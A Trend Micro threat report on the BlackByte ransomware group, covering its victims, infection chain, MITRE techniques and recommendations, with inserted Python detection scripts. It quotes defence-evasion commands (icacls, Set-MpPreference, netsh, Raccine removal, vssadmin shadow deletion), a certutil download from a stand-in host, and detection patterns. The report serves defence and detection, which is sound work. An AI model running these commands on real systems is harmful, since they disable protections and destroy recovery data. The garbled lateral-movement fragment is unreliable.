# Ransomware Spotlight: BlackByte

**[trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte)**

By Trend Micro Research

BlackByte is a ransomware group that has been building a name for itself since 2021. Like its contemporaries, it has gone after critical infrastructure for a higher chance of getting a payout. What techniques set it apart?

BlackByte debuted in July 2021. Its first year of activity garnered the attention of the Federal Bureau of Investigation (FBI) and the US Secret Service (USSS). According to a [joint advisory by these two government agencies](https://www.ic3.gov/Media/News/2022/220211.pdf), BlackByte had already gone after at least three US critical infrastructure sectors (government facilities, financial, and food and agriculture) by November 2021. This advisory shows how BlackByte was actively establishing itself as a noteworthy new [ransomware](https://www.trendmicro.com/vinfo/my/security/definition/ransomware) variant. In October 2021, Trustwave [released a publicly available decrypter for BlackByte](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/). This did not stop BlackByte: its developers released newer versions that used multiple keys and ramped up operations, going as far as to [warn their victims against using the available decrypter on their website](https://www.theregister.com/2022/05/19/blackbyte-ransomware-attacks/).

BlackByte's emergence could be part of a larger scheme. With the purported shutdown of [Conti](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-conti), researchers from AdvIntel surmise that [BlackByte is one of the chief new ransomware variants that are part of its rebranding](https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups). At present, BlackByte continues to target organizations all over the world. However, like [LockBit](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-lockbit), [RansomEXX](https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx), and many other ransomware families, BlackByte avoids attacking Russia-based entities.

## What do organizations need to know about BlackByte?

While BlackByte operators use their ransomware in attacks for their own gain, they also run a ransomware-as-a-service (RaaS) model for affiliates. The key highlights of BlackByte are:

- **Initial versions used symmetric keys.** The earlier variant of BlackByte used the same key in each campaign to encrypt files. It also used AES, a symmetric key algorithm. This allowed researchers to create a decrypter to help BlackByte victims, forcing the group to change its encryption method in newer variants.
- **It has multiple variants.** The first known version of BlackByte was written in C#. Operators then released two Go-based variants. The more recent Go variant was introduced around February 2022 and sported modifications, particularly in its encryption algorithm.
- **Archives files using WinRAR.** In BlackByte campaigns, data exfiltration is done before the ransomware is deployed. This is because the BlackByte ransomware is incapable of exfiltrating data; instead, the operators archive files using WinRAR and upload the archive to file-sharing sites.
- **Uses trojanized legitimate tools.** Like most modern ransomware variants, BlackByte uses [living-off-the-land binaries](https://www.trendmicro.com/vinfo/my/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021). For example, it uses the remote tool AnyDesk to gain further control over a system and for lateral movement.
- **Involves phishing emails or a known ProxyShell vulnerability for initial access.** BlackByte has been known to use phishing emails or to exploit unpatched ProxyShell vulnerabilities in Microsoft Exchange servers to gain initial access to a system.

BlackByte's trajectory seems to point to continuing activity. In fact, reports indicate that BlackByte is among the ransomware operations that [set their sights on Latin American governments in May 2022](https://www.recordedfuture.com/latin-american-governments-targeted-by-ransomware). This report is reflected in our own telemetry data, as seen in the next section.

## Top affected industries and countries

The data used in this section represent the count of unique machines where BlackByte-related activity had been detected. Based on our telemetry data, BlackByte showed a fairly consistent level of activity from October 2021 to March 2022. However, May 2022 detections showed a drastic uptick in number.

Figure 1. BlackByte monthly unique detections (October 1, 2021 to May 31, 2022)
_Source: Trend Micro™ Smart Protection Network™_

Based on our telemetry data from April 30, 2021 to May 31, 2022, we detected BlackByte activity all over the globe. However, after the spike in activity in May, Peru outstripped other countries in detections. This is consistent with [the reported escalation of ransomware attacks in Latin America](https://www.recordedfuture.com/latin-american-governments-targeted-by-ransomware), where BlackByte was also reportedly among those that targeted the region.

Figure 2. Countries with the highest number of attack attempts for the BlackByte ransomware (April 30, 2021 to May 30, 2022)
_Source: Trend Micro Smart Protection Network_

Up to the end of April 2022, the technology sector saw the most BlackByte detections; however, in May, detections in the government sector also shot up.

Figure 3. Countries with the highest number of attack attempts for the BlackByte ransomware (April 30, 2021 to May 30, 2022)
_Source: Trend Micro Smart Protection Network_

One way to interpret these observations is that the drastic increase stemmed from a single attack that affected several machines. Aside from the reports on ransomware groups targeting Latin America, this explanation is also based on the report that, by their own claim, BlackByte operators had compromised a Peruvian government entity around the time of the increased activity.

## Targeted regions and sectors according to the BlackByte leak site

In addition to these detections, we delved into BlackByte's leak site to see the number of attacks recorded there. We looked at data from August 1, 2021 to May 31, 2022. Based on what we found on the site, BlackByte's victims were composed mostly of small businesses. The activity peaked in November 2021. Overall, the leak site has yet to reflect the focused attack on Latin American governments. The distribution of their attacks per region showed, instead, a proclivity for targeting entities based in North America and Europe.

Figure 4. Regional distribution of BlackByte victims according to the group's leak site (August 1, 2021 to May 31, 2022)

Based on the leak site data alone, BlackByte operators and their affiliates have yet to show a marked interest in any one sector.
We found a relatively even distribution of attacks across industries, which included the following:

- Construction
- Materials
- Healthcare
- Retail
- Transportation
- Energy & Utilities
- Manufacturing
- Professional services
- Automobile
- Community
- Foods & Staples
- Real Estate
- Government
- IT
- Legal services
- Media and entertainment

Comparing BlackByte's leak site data to that of other ransomware families shows that from January 1, 2022 to May 31, 2022, BlackByte was among the 10 ransomware groups with the greatest number of self-reported victims.

Figure 5. Top ransomware groups with the greatest number of listed victims on their respective leak sites (January 1, 2022 to May 31, 2022)

The data seem to show that BlackByte's operation is beginning to build a name for itself in the threat landscape while still building momentum. The following section shows how it works and how it conducts its attacks.

## Infection chain and techniques

Given that BlackByte operates on the RaaS model, its infection chain can vary depending on the target.

Figure 6. BlackByte infection chain

**Initial Access**

BlackByte can arrive on a system by exploiting the ProxyShell vulnerabilities. Exploiting the vulnerable server allows the attacker to create a web shell on the system, which is then used to download and drop Cobeacon using Certutil. After initial access, the attackers use Certutil to download and execute the components they need to propagate in the network. Once deployed, Cobeacon is used to execute the BlackByte ransomware.

**Discovery and Lateral Movement**

Based on our data, the actors used NetScan as a network discovery tool, which gives the attackers a good view of the victim's network environment. After network reconnaissance, the attackers deploy AnyDesk on the system for an additional level of control. The attackers repeat this process of discovery and deployment of Cobeacon and AnyDesk until they achieve their goals.
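The chain described above (a web shell on the Exchange server, Certutil fetching Cobeacon, NetScan for discovery, AnyDesk for control) gives a defender three host-side signals that can be checked in process-creation telemetry. The following Python script is an added example and is not code from the article or from Trend Micro. It assumes a simple record layout (timestamp, host, parent image, image, command line), treats `w3wp.exe` as the IIS worker that would run an Exchange web shell (the article does not name the process), and uses constructed sample records with a TEST-NET address. It goes a step beyond the text by reconstructing, per host, the order in which the stages appeared, so an analyst can tell a lone AnyDesk install from a host that went through web shell, download and discovery in sequence.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (not from the article or any real
# telemetry). Field order: timestamp, host, parent image, image, command line.
# 198.51.100.7 is a TEST-NET address standing in for the download host.
SAMPLE_EVENTS = [
    ("2022-05-02T09:14:03", "exch01", "w3wp.exe", "cmd.exe",
     r"cmd.exe /c certutil.exe -urlcache -f http://198.51.100.7/b.png C:\ProgramData\b.png"),
    ("2022-05-02T09:14:04", "exch01", "cmd.exe", "certutil.exe",
     r"certutil.exe -urlcache -f http://198.51.100.7/b.png C:\ProgramData\b.png"),
    ("2022-05-02T09:31:10", "exch01", "cmd.exe", "netscan.exe", "netscan.exe"),
    ("2022-05-02T10:02:45", "ws07", "services.exe", "AnyDesk.exe",
     r'"C:\ProgramData\AnyDesk\AnyDesk.exe"'),
    # Benign look-alikes: a user shell not under the web server, certutil hashing a file.
    ("2022-05-02T10:05:00", "ws07", "explorer.exe", "cmd.exe", "cmd.exe /c dir"),
    ("2022-05-02T10:06:12", "ws07", "cmd.exe", "certutil.exe",
     r"certutil.exe -hashfile C:\Users\Public\setup.msi SHA256"),
]

# Assumption: the Exchange web shell runs inside the IIS worker process w3wp.exe.
WEB_SERVER_PROCESSES = {"w3wp.exe"}
SHELL_LIKE = {"cmd.exe", "powershell.exe", "certutil.exe"}
REMOTE_TOOLS = {"netscan.exe": "NetScan (network discovery)",
                "anydesk.exe": "AnyDesk (remote control)"}
URL_RE = re.compile(r"https?://\S+", re.I)


def classify(event):
    """Return (stage, detail) when the record matches one of the chain signals, else None."""
    _ts, _host, parent, image, cmd = event
    parent_l, image_l = parent.lower(), image.lower()
    if parent_l in WEB_SERVER_PROCESSES and image_l in SHELL_LIKE:
        return ("initial_access", f"web server process {parent} spawned {image}")
    if image_l == "certutil.exe":
        m = URL_RE.search(cmd)
        # certutil with a URL on its command line is the download step; other uses are ignored
        return ("download", f"certutil fetched {m.group(0)}") if m else None
    if image_l in REMOTE_TOOLS:
        return ("discovery_or_control", REMOTE_TOOLS[image_l])
    return None


def scan(events):
    """All hits as (timestamp, host, stage, detail)."""
    hits = []
    for ev in events:
        result = classify(ev)
        if result:
            hits.append((ev[0], ev[1], result[0], result[1]))
    return hits


def stage_sequence(hits):
    """Per host, the distinct stages in the order they were first seen."""
    seq = defaultdict(list)
    for _ts, host, stage, _detail in sorted(hits):  # ISO timestamps sort lexically
        if stage not in seq[host]:
            seq[host].append(stage)
    return dict(seq)


def hosts_with_full_chain(hits):
    """Hosts where a web-server child process was followed by a certutil download."""
    return sorted(
        host for host, stages in stage_sequence(hits).items()
        if "initial_access" in stages and "download" in stages
        and stages.index("initial_access") < stages.index("download")
    )


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for ts, host, stage, detail in found:
        print(f"{ts} {host} {stage}: {detail}")
    print("stage order per host:", stage_sequence(found))
    print("hosts with web shell -> download:", hosts_with_full_chain(found))
```

Fed into a SIEM, the same three checks would run against real process-creation events; the ordering step is what separates a single remote-admin tool on a workstation from a server that matches the BlackByte arrival sequence.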
During the execution of BlackByte, it terminates certain processes and services related to security applications to evade detection.

**Exfiltration**

Once the attackers have sufficiently infiltrated the victim's network and identified valuable files, they exfiltrate them using WinRAR to archive the files and upload them to file-sharing sites such as anonymfiles[.]com and file[.]io.

**Impact**

Once the ransomware is executed, it terminates certain services and processes related to security applications to evade detection. It also connects to its C&C server, where it looks for a certain PNG file that contains information critical to encryption and is used to derive the AES-128 key. This key is then protected using an embedded RSA key, so the encrypted data cannot be decrypted without the corresponding private key. The ransomware then deletes shadow copies in the system using vssadmin.

Figure 7. Sample ransom note

**Other technical details**

It avoids encrypting files with the following strings in their file name:

obamka.js, thumbs.db, ntdetect.com, ntuser.dat.log, bootnxt, bootsect.bak, ntldr, autoexec.bat, Recycle.Bin, iconcache.db, bootmgr, bootfont.bin

It avoids encrypting files with the following extensions:

msilog, log, ldf, lock, theme, msi, sys, wpx, cpl, adv, msc, scr, key, ico, dll, hta, deskthemepack, nomedia, msu, rtp, msp, idx, ani, 386, diagcfg, bin, mod, ics, com, hlp, spl, nls, cab, exe, diagpkg, icl, ocx, rom, prf, themepack, msstyles, icns, mpa, drv, cur, diagcab, cmd, shs

It terminates the following services:

SQLTELEMETRY, SQLTELEMETRY$ECWDB2, SQLWriter, SstpSvc, MBAMService, wuauserv

It terminates the following processes found in the affected system's memory:

agntsvc, CNTAoSMgr, dbeng50, dbsnmp, encsvc, excel, firefox, firefoxconfig, infopath, isqlplussvc, mbamtray, msaccess, msftesql, mspub, mydesktopqos, mydesktopservice, mysqld, mysqld-nt, mysqld-opt, Ntrtscan, ocautoupds, ocomm, ocssd, onenote, oracle, outlook, PccNTMon, powerpnt, sqbcoreservice, sql, sqlagent, sqlbrowser, sqlservr, sqlwriter, steam, synctime, tbirdconfig, thebat, thebat64, thunderbird, tmlisten, visio, winword, wordpad, xfssvccon, zoolz, anydesk, chrome, opera, msedge, firefox, iexplore, explorer, winlogon, SearchIndexer, wininit, SearchApp, SearchUI, Powershel

## MITRE tactics and techniques

**Initial Access**

- **T1190 - Exploit Public-Facing Application.** It has been observed using the ProxyShell exploit to deliver the China Chopper web shell as its initial arrival.

**Persistence**

- **T1053.005 - Scheduled Task/Job: Scheduled Task.** It creates a scheduled task to execute its JavaScript and proceed with its routine on bootup. Task name: Joke. Trigger: once, at 00:00. Action: wscript.exe.

**Privilege Escalation**

- **T1134 - Access Token Manipulation.** This ransomware modifies the registry to elevate local privilege and enable linked connections.

**Defense Evasion**

- **T1140 - Deobfuscate/Decode Files or Information.** It initially arrives as an obfuscated JavaScript file which is decoded upon execution.
- **T1222 - File and Directory Permissions Modification.** It uses mountvol.exe to mount volume names and icacls.exe to grant "Everyone" full access to the volume: `"C:\Windows\System32\icacls.exe" "C:\*" /grant Everyone:F /T /C /Q`. It also disables controlled folder access using PowerShell: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled`. It also modifies firewall settings to enable linked connections: `"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes` and `"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes`.
- **T1562.001 - Impair Defenses: Disable or Modify Tools.** It disables Raccine, an anti-ransomware utility, using these commands: `taskkill.exe /F /IM Raccine.exe`, `taskkill.exe /F /IM RaccineSettings.exe`, and `schtasks.exe /DELETE /TN "Raccine Rules Updater" /F`. It also deletes the Raccine autostart entries: `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`, Name = "Raccine Tray", and `HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine`.

**Discovery**

- **T1083 - File and Directory Discovery.** This ransomware discovers files and directories by first enumerating the logical drives. Once enumerated, it changes the access control of files and directories so that it has full access over them. It then goes through the directories and traverses them for target files to encrypt.
- **T1069.002 - Permission Groups Discovery: Domain Groups.** It uses the RootDSE entry from Active Directory to get a listing of the hostnames under that domain in preparation for its propagation in the network. It enumerates 1000 hostnames in the domain.
- **Remote System Discovery.** After getting the hostnames of the remote systems, it attempts to ping the systems to see if they are alive and accessible. Then it proceeds with the transfer to the public share folder.

**Lateral Movement**

- **T1570 - Lateral Tool Transfer.** (This cell is cut off in the source; the surviving fragments follow.) It checks present: C:\Users\ (infection system) It doesnt propagati It checks system if following accessibl \C$\Users \Users\Pu It then cre infection system, w \Users\Pu \C$\Users It then co file in the share and through s which wa start of ro

## Summary of malware, tools, and exploits used

Security teams can watch for the presence of the following malware, tools, and exploits that are typically used in BlackByte attacks:

| Initial Access | Execution | Discovery | Lateral Movement | Collection | Exfiltration |
|---|---|---|---|---|---|
| ProxyShell | Certutil | NetScan | AnyDesk | WinRAR | Exfiltrates to the following C&C: anonymfiles[.]com, file[.]io |
| China Chopper web shell | Cobeacon | | Cobeacon | | |

## Recommendations

Organizations face both established ransomware families and newer variants that are just entering the fray. Like many newer ransomware families, BlackByte is readying itself to take the spot of any big-game ransomware operation in decline. However, underneath it all could be a more intricate scheme of threat groups dispersing under new monikers. As in the case of BlackByte, knowing a group's notable tactics while also staying knowledgeable of bigger trends can help organizations create an effective strategy against ransomware attacks. In the case of BlackByte, prevention is key: keep employees wary of phishing tactics and keep up with security patches such as those for the ProxyShell vulnerabilities.

To help defend systems against similar threats, organizations can establish security frameworks that allocate resources systematically for establishing solid defenses against ransomware. Here are some best practices that can be included in these frameworks:

**Audit and inventory**

- Take an inventory of assets and data
- Identify authorized and unauthorized devices and software
- Make an audit of event and incident logs

**Configure and monitor**

- Manage hardware and software configurations
- Grant admin privileges and access only when necessary to an employee's role
- Monitor network ports, protocols, and services
- Activate security configurations on network infrastructure devices such as firewalls and routers
- Establish a software allowlist that only executes legitimate applications

**Patch and update**

- Conduct regular vulnerability assessments
- Perform patching or virtual patching for operating systems and applications
- Update software and applications to their latest versions

**Protect and recover**

- Implement data protection, backup, and recovery measures
- Enable multifactor authentication (MFA)

**Secure and defend**

- Employ sandbox analysis to block malicious emails
- Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network
- Detect early signs of an attack such as the presence of suspicious tools in the system
- Use advanced detection technologies such as those powered by AI and machine learning

**Train and test**

- Regularly train and assess employees' security skills
- Conduct red-team exercises and penetration tests

A multilayered approach can help organizations guard possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior can also help protect enterprises.

[Trend Micro Vision One™](https://www.trendmicro.com/en_us/business/products/detection-response.html) provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on, before the ransomware can do irreversible damage to the system.

[Trend Micro Cloud One™ Workload Security](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-one-workload-security.html) protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.

[Trend Micro™ Deep Discovery™ Email Inspector](https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/email-inspector.html) employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.

[Trend Micro Apex One™](https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint.html) offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.

## Indicators of Compromise (IOCs)

The IOCs for this article can be found [here](https://documents.trendmicro.com/images/TEx/articles/ioc_spotlight_blackbyteXwCUeHS.txt). Actual indicators might vary per attack.
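The MITRE table above quotes the exact command lines BlackByte uses to loosen permissions (icacls), disable controlled folder access (Set-MpPreference), open firewall rule groups (netsh) and remove Raccine (taskkill, schtasks), plus the "Joke" scheduled task; the Impact section adds shadow-copy deletion with vssadmin, and the Exfiltration section names the two file-sharing sites. Those strings are enough to build host-level detections. The Python script below is an added example, not code from the article or from Trend Micro. It assumes three simple record types (process command lines, scheduled-task registrations, outbound proxy requests) with constructed sample data, derives one rule per quoted behaviour, and escalates only hosts where several distinct behaviours co-occur, because a single icacls or netsh call can be an administrator while four of these on one machine rarely are.

```python
import re
from collections import defaultdict

# Constructed sample records (not from the article or any real telemetry); the field
# names are assumed. "process" records carry a command line, "task" records a scheduled
# task registration, "proxy" records an outbound HTTP request.
SAMPLE_EVENTS = [
    {"kind": "process", "host": "ws01", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"kind": "process", "host": "ws01", "cmd": "taskkill.exe /F /IM Raccine.exe"},
    {"kind": "process", "host": "ws01", "cmd": 'schtasks.exe /DELETE /TN "Raccine Rules Updater" /F'},
    {"kind": "process", "host": "ws01",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled'},
    {"kind": "process", "host": "ws02",
     "cmd": r'"C:\Windows\System32\icacls.exe" "C:\*" /grant Everyone:F /T /C /Q'},
    {"kind": "process", "host": "ws02",
     "cmd": r'"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes'},
    {"kind": "task", "host": "ws02", "task_name": "Joke", "action": "wscript.exe"},
    {"kind": "proxy", "host": "ws02", "method": "POST", "url": "https://file.io/"},
    # Benign look-alikes: permissions on one folder, a Defender query, ordinary browsing.
    {"kind": "process", "host": "ws03", "cmd": r'icacls.exe "C:\Users\jdoe\Documents" /grant jdoe:F'},
    {"kind": "process", "host": "ws03", "cmd": "powershell.exe Get-MpPreference"},
    {"kind": "proxy", "host": "ws03", "method": "GET", "url": "https://www.trendmicro.com/"},
]

# Command-line rules derived from the strings quoted in the MITRE table and the Impact
# section: (technique label as the article groups it, description, pattern).
PROCESS_RULES = [
    ("T1562.001", "Raccine process killed",
     re.compile(r"taskkill(\.exe)?\s+/F\s+/IM\s+Raccine(Settings)?\.exe", re.I)),
    ("T1562.001", "Raccine Rules Updater task deleted",
     re.compile(r'schtasks(\.exe)?\s+/DELETE\s+/TN\s+\\?"Raccine Rules Updater', re.I)),
    ("T1562.001", "Controlled Folder Access disabled",
     re.compile(r"Set-MpPreference\s+-EnableControlledFolderAccess\s+Disabled", re.I)),
    ("T1222", "icacls grants Everyone full control of a whole volume",
     re.compile(r'icacls(\.exe)?"?\s+"?[A-Za-z]:\\\*"?\s+/grant\s+Everyone:F', re.I)),
    ("T1222", "netsh enables Network Discovery or File and Printer Sharing",
     re.compile(r'netsh(\.exe)?"?\s+advfirewall\s+firewall\s+set\s+rule\s+group="(Network Discovery|File and Printer Sharing)"\s+new\s+enable=Yes', re.I)),
    ("Impact", "shadow copies deleted with vssadmin",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
]

# The article lists the exfiltration sites defanged; refang them for matching.
EXFIL_DOMAINS = {d.replace("[.]", ".") for d in ("anonymfiles[.]com", "file[.]io")}
HOST_RE = re.compile(r"^https?://([^/:]+)", re.I)


def match_event(ev):
    """Return the list of (technique, description) pairs one record triggers."""
    found = []
    if ev["kind"] == "process":
        for tech, desc, rx in PROCESS_RULES:
            if rx.search(ev["cmd"]):
                found.append((tech, desc))
    elif ev["kind"] == "task":
        if ev["task_name"].lower() == "joke" and "wscript" in ev["action"].lower():
            found.append(("T1053.005", 'scheduled task "Joke" runs wscript.exe'))
    elif ev["kind"] == "proxy":
        m = HOST_RE.match(ev["url"])
        # Only uploads matter: a GET to file.io is a download or a browser visit.
        if m and m.group(1).lower() in EXFIL_DOMAINS and ev["method"].upper() == "POST":
            found.append(("Exfiltration", f"upload to {m.group(1)}"))
    return found


def scan(events):
    """All (host, technique, description) hits across the records."""
    return [(ev["host"], tech, desc) for ev in events for tech, desc in match_event(ev)]


def hosts_to_escalate(hits, min_behaviours=2):
    """Hosts showing at least min_behaviours distinct BlackByte behaviours."""
    per_host = defaultdict(set)
    for host, _tech, desc in hits:
        per_host[host].add(desc)
    return sorted(h for h, descs in per_host.items() if len(descs) >= min_behaviours)


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for host, tech, desc in found:
        print(f"{host}: [{tech}] {desc}")
    print("escalate:", hosts_to_escalate(found))
```

The regular expressions accept both the bare and the fully qualified forms of each binary, since the article quotes both styles; the `min_behaviours` threshold is the knob to tune against the noise level of a given environment.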